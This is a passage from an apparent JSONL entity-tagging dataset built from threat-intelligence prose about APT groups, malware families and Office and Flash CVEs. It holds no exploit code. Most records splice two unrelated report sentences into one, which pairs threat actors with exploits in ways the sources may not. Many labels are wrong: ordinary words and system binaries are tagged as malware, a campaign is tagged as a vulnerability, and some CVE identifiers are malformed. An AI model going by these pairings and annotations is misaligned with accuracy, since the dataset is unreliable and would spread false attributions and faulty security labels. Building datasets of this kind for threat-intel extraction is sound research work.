The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": [{"start": 21, "end": 34, "label": "System"}, {"start": 77, "end": 95, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}]} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 297, "end": 316, "label": "Organization"}, {"start": 354, "end": 362, "label": "Vulnerability"}]} {"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": [{"start": 46, "end": 64, "label": "Malware"}, {"start": 147, "end": 150, "label": "System"}, {"start": 151, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 180, "label": "System"}, {"start": 181, "end": 189, "label": "Vulnerability"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 221, "end": 225, "label": "System"}, {"start": 226, "end": 234, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Malware"}]} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . 
While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}, {"start": 257, "end": 262, "label": "Organization"}, {"start": 302, "end": 315, "label": "Vulnerability"}, {"start": 339, "end": 352, "label": "Organization"}]} {"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 77, "end": 95, "label": "System"}, {"start": 99, "end": 122, "label": "System"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 242, "end": 244, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 379, "end": 393, "label": "Vulnerability"}]} {"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . 
The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 42, "end": 53, "label": "Malware"}, {"start": 58, "end": 69, "label": "Malware"}, {"start": 76, "end": 82, "label": "Organization"}, {"start": 96, "end": 103, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 202, "end": 208, "label": "Malware"}, {"start": 216, "end": 224, "label": "Malware"}]} {"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 128, "end": 135, "label": "System"}, {"start": 168, "end": 180, "label": "Malware"}, {"start": 204, "end": 228, "label": "Indicator"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 257, "end": 264, "label": "System"}, {"start": 265, "end": 307, "label": "System"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 333, "end": 346, "label": "Vulnerability"}]} {"text": "However , over the last nine campaigns since Trend Micro\u2018s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . 
Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": [{"start": 45, "end": 58, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 158, "end": 173, "label": "System"}, {"start": 228, "end": 238, "label": "System"}, {"start": 247, "end": 259, "label": "Malware"}, {"start": 288, "end": 301, "label": "Organization"}, {"start": 315, "end": 322, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}]} {"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": [{"start": 114, "end": 122, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 173, "end": 180, "label": "Vulnerability"}, {"start": 181, "end": 194, "label": "Vulnerability"}, {"start": 227, "end": 242, "label": "Malware"}]} {"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 100, "end": 110, "label": "System"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 234, "end": 242, "label": "Indicator"}, {"start": 258, "end": 271, "label": "Vulnerability"}]} {"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . 
In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 27, "end": 36, "label": "Malware"}, {"start": 65, "end": 73, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 147, "end": 163, "label": "System"}, {"start": 178, "end": 192, "label": "Vulnerability"}, {"start": 203, "end": 211, "label": "Malware"}, {"start": 216, "end": 227, "label": "Malware"}, {"start": 251, "end": 260, "label": "Organization"}]} {"text": "The following are the three files:Defender.sct \u2013 The malicious JavaScript based scriptlet file . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 80, "end": 89, "label": "Malware"}, {"start": 90, "end": 94, "label": "Malware"}, {"start": 97, "end": 101, "label": "Malware"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 193, "end": 212, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 322, "end": 330, "label": "Vulnerability"}, {"start": 363, "end": 367, "label": "Malware"}]} {"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. 
government website and a variety of others .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 186, "end": 190, "label": "Malware"}, {"start": 212, "end": 220, "label": "Vulnerability"}, {"start": 221, "end": 228, "label": "Vulnerability"}]} {"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 205, "label": "Vulnerability"}]} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 135, "end": 148, "label": "Indicator"}, {"start": 198, "end": 202, "label": "System"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 246, "end": 253, "label": "Vulnerability"}]} {"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . 
PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": [{"start": 56, "end": 72, "label": "Malware"}, {"start": 94, "end": 97, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 111, "end": 121, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 202, "end": 207, "label": "System"}]} {"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller\u2019s payload . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 170, "end": 180, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 207, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 223, "label": "Vulnerability"}]} {"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . 
NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 214, "end": 221, "label": "Vulnerability"}, {"start": 232, "end": 242, "label": "Organization"}]} {"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we\u2019ve been tracking as BACKSWING . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 166, "end": 175, "label": "System"}, {"start": 217, "end": 232, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 318, "end": 325, "label": "Vulnerability"}, {"start": 326, "end": 333, "label": "Vulnerability"}]} {"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware . 
The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 56, "end": 63, "label": "Organization"}, {"start": 177, "end": 203, "label": "Malware"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 314, "end": 324, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 370, "end": 388, "label": "System"}, {"start": 389, "end": 397, "label": "Vulnerability"}, {"start": 414, "end": 427, "label": "Vulnerability"}, {"start": 474, "end": 480, "label": "Malware"}]} {"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": [{"start": 37, "end": 46, "label": "Organization"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 271, "end": 279, "label": "Vulnerability"}, {"start": 280, "end": 287, "label": "Vulnerability"}, {"start": 296, "end": 306, "label": "Organization"}]} {"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 
14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": [{"start": 6, "end": 13, "label": "Organization"}, {"start": 40, "end": 49, "label": "Organization"}, {"start": 61, "end": 70, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 198, "end": 215, "label": "Malware"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 270, "end": 284, "label": "Vulnerability"}, {"start": 305, "end": 312, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 343, "end": 350, "label": "Vulnerability"}, {"start": 359, "end": 375, "label": "System"}, {"start": 402, "end": 425, "label": "Organization"}]} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 168, "end": 177, "label": "Indicator"}, {"start": 193, "end": 206, "label": "Vulnerability"}]} {"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 47, "end": 60, "label": "Malware"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 160, "end": 176, "label": "System"}, {"start": 191, "end": 205, "label": "Vulnerability"}, {"start": 216, "end": 224, "label": "Malware"}, {"start": 229, "end": 240, "label": "Malware"}]} {"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . 
During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 108, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 260, "end": 273, "label": "Vulnerability"}, {"start": 278, "end": 292, "label": "Vulnerability"}]} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 286, "end": 302, "label": "System"}, {"start": 317, "end": 331, "label": "Vulnerability"}, {"start": 342, "end": 350, "label": "Malware"}, {"start": 355, "end": 366, "label": "Malware"}, {"start": 390, "end": 399, "label": "Organization"}]} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 251, "end": 259, "label": "Malware"}, {"start": 282, "end": 295, "label": "Malware"}, {"start": 316, "end": 329, "label": "Vulnerability"}]} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 248, "end": 255, "label": "Vulnerability"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 274, "end": 281, "label": "System"}, {"start": 282, "end": 307, "label": "System"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 377, "end": 386, "label": "Organization"}, {"start": 387, "end": 394, "label": "System"}]} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . 
This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 307, "end": 313, "label": "System"}, {"start": 321, "end": 346, "label": "Indicator"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 407, "end": 419, "label": "Malware"}, {"start": 451, "end": 477, "label": "Malware"}, {"start": 480, "end": 483, "label": "Malware"}]} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 248, "end": 254, "label": "System"}, {"start": 262, "end": 287, "label": "Indicator"}, {"start": 320, "end": 333, "label": "Vulnerability"}, {"start": 348, "end": 360, "label": "Malware"}, {"start": 392, "end": 418, "label": "Malware"}, {"start": 421, "end": 424, "label": "Malware"}]} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Indicator"}, {"start": 191, "end": 198, "label": "Vulnerability"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 211, "end": 226, "label": "System"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}]} {"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 349, "end": 357, "label": "Vulnerability"}]} {"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . 
TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 195, "end": 199, "label": "System"}, {"start": 218, "end": 222, "label": "Malware"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 175, "end": 182, "label": "Organization"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 278, "end": 298, "label": "Malware"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 340, "end": 345, "label": "Malware"}, {"start": 446, "end": 453, "label": "Vulnerability"}]} {"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . 
In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 208, "end": 221, "label": "Vulnerability"}, {"start": 289, "end": 309, "label": "Malware"}, {"start": 316, "end": 329, "label": "Vulnerability"}, {"start": 351, "end": 356, "label": "Malware"}, {"start": 457, "end": 464, "label": "Vulnerability"}]} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}]} {"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 271, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 320, "label": "Malware"}]} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . 
LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 202, "end": 218, "label": "System"}, {"start": 235, "end": 249, "label": "Vulnerability"}]} {"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 86, "end": 89, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 136, "end": 144, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 318, "end": 331, "label": "Vulnerability"}, {"start": 364, "end": 381, "label": "Organization"}]} {"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Execute a command through exploits for CVE-2017-11882 .", "spans": [{"start": 66, "end": 80, "label": "Vulnerability"}, {"start": 147, "end": 161, "label": "Malware"}, {"start": 192, "end": 204, "label": "Malware"}, {"start": 324, "end": 338, "label": "Vulnerability"}]} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . 
Execute a command through exploits for CVE-2018-0802 .", "spans": [{"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 118, "end": 143, "label": "Malware"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 249, "end": 262, "label": "Vulnerability"}]} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 228, "end": 242, "label": "Vulnerability"}, {"start": 275, "end": 281, "label": "Vulnerability"}, {"start": 282, "end": 290, "label": "Vulnerability"}, {"start": 291, "end": 304, "label": "Vulnerability"}]} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 256, "end": 270, "label": "Organization"}, {"start": 296, "end": 309, "label": "Vulnerability"}]} {"text": "The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 137, "end": 146, "label": "Indicator"}, {"start": 230, "end": 243, "label": "Vulnerability"}, {"start": 299, "end": 313, "label": "System"}, {"start": 314, "end": 329, "label": "Vulnerability"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 244, "end": 257, "label": "Vulnerability"}, {"start": 258, "end": 261, "label": "System"}, {"start": 262, "end": 269, "label": "Vulnerability"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 285, "end": 296, "label": "System"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 323, "end": 333, "label": "Organization"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 297, "end": 304, "label": "Vulnerability"}, {"start": 311, "end": 316, "label": "System"}, {"start": 333, "end": 346, "label": "Vulnerability"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 273, "end": 302, "label": 